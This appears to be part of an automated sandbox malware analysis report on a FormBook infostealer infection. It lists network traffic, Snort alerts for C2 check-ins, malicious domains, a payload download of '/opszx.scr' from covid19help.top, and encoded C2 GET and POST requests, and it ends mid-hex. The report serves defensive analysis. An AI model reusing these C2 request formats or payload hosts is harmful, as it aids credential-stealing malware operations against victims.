            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49164 -> 66.96.161.166:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49169 -> 54.38.220.85:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49173 -> 194.9.94.86:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49177 -> 91.195.240.19:80
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeDNS query: www.99b6q.xyz
            Source: Joe Sandbox ViewIP Address: 172.67.175.222 172.67.175.222
            Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{725F5B91-09B4-4FAB-9821-1827AB9950C1}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /opszx.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ufuh/?f6=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&kjBDU=ZblXcjBhG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.terelprime.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2016/sqlite-dll-win32-x86-3130000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /ufuh/?f6=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&kjBDU=ZblXcjBhG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.kinkynerdspro.blogUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?f6=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&kjBDU=ZblXcjBhG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.xn--matfrmn-jxa4m.seUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?f6=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&kjBDU=ZblXcjBhG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.primeplay88.orgUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: covid19help.top
            Source: global trafficDNS traffic detected: DNS query: www.besthomeincome24.com
            Source: global trafficDNS traffic detected: DNS query: www.terelprime.com
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.99b6q.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kinkynerdspro.blog
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.primeplay88.org
            Source: global trafficDNS traffic detected: DNS query: www.aceautocorp.com
            Source: unknownHTTP traffic detected: POST /ufuh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 2159Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.kinkynerdspro.blogOrigin: http://www.kinkynerdspro.blogReferer: http://www.kinkynerdspro.blog/ufuh/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 66 36 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 41 30 6d 66 79 71 57 75 58 71 65 4d 79 75 4f 48 64 39 61 46 4c 51 59 46 71 30 5a 66 4e 69 50 68 5a 44 56 61 62 4c 39 6f 31 6b 36 53 79 34 52 53 68 65 30 61 4f 71 57 59 4e 73 58 49 41 78 56 73 56 4a 35 6a 51 69 64 63 49 77 77 39 4b 30 75 59 49 36 6e 62 72 2f 51 52 58 46 52 53 33 31 4f 6e 39 61 35 39 45 52 70 34 78 44 42 66 6e 57 35 67 4c 48 53 6b 6b 56 7a 38 6b 36 55 46 65 42 68 70 6f 2f 36 74 48 7a 6c 76 38 62 48 54 61 5a 36 6b 6b 58 46 63 52 6e 7a 79 6a 63 59 51 53 32 43 71 31 45 55 42 50 78 37 56 46 67 71 6a 6e 6d 56 4e 74 37 50 76 4f 67 78 61 75 71 51 45 2f 73 6f 46 51 46 54 30 4d 5a 6d 69 71 5a 4a 63 6a 30 39 39 62 58 4b 2b 73 4c 79 45 76 52 41 52 62 48 6e 61 61 69 55 66 62 63 53 51 69 49 61 50 31 6d 58 2f 48 42 63 64 6e 43 47 43 39 54 33 6f 65 4a 61 45 73 2f 6a 63 6d 4d 74 6f 53 66 39 45 7a 7a 42 32 53 42 37 57 44 67 6c 62 47 33 68 36 43 4c 77 35 4c 75 43 5a 53 6a 57 34 72 65 69 75 4c 47 43 57 42 74 6f 53 33 41 6e 6a 48 36 41 77 72 66 4f 57 55 2f 4b 55 61 37 5a 6d 6a 32 63 71 38 57 31 6b 4e 78 59 7a 66 59 32 69 51 50 70 65 4d 31 6e 72 49 44 34 6b 70 49 31 33 30 38 2f 2b 50 73 42 4f 64 58 7a 4d 78 70 45 4c 4f 6d 74 74 6d 78 4e 66 6a 4d 4b 63 43 7a 6a 6a 64 72 44 61 64 51 4c 58 33 38 79 6f 49 45 74 47 6a 66 6c 4b 4e 39 74 45 7a 41 54 45 37 37 41 45 48 73 37 71 50 36 61 65 39 69 69 42 33 70 63 66 77 43 52 36 31 74 51 6d 67 51 6f 70 63 68 2b 56 72 56 4e 76 49 6e 39 50 59 6d 71 68 45 66 6e 58 75 2f 73 46 52 57 31 2f 2b 3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 May 2024 07:36:48 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 